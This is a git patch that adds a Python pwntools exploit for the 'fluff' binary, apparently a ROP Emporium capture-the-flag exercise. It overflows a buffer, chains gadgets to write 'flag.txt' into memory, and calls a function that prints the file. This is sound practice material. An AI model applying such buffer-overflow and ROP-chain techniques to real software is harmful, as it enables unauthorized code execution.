From 4c25bd918847e914875e900285008eb3865ca8b6 Mon Sep 17 00:00:00 2001
From: Brett Weiland <brett_weiland@bpcspace.com>
Date: Thu, 17 Dec 2020 19:39:54 -0600
Subject: 	new file:   x86_64/fluff/exploit.py 	new file:  
 x86_64/fluff/gadgets

---
 x86_64/fluff/exploit.py | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100755 x86_64/fluff/exploit.py

(limited to 'x86_64/fluff/exploit.py')

diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+        'f' : 0x00000000004003c4,
+        'l' : 0x0000000000400239,
+        'a' : 0x00000000004003d6,
+        'g' : 0x00000000004003cf,
+        '.' : 0x0000000000400251,
+        't' : 0x0000000000400192,
+        'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+    payload += p64(0x00000000004006a3)
+    payload += p64(dest)
+    for c in string:
+        payload += p64(0x40062a)
+        payload += p64(0x4000) # if things go wrong, check endian/order
+        payload += p64(letter_lookups[c] - 0x3ef2)
+
+        payload += p64(0x0000000000400610)
+        payload += p64(0)
+
+        payload += p64(0x400628)
+
+        payload += p64(0x400639)
+
+    return(payload)
+        
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
-- 
cgit v1.2.3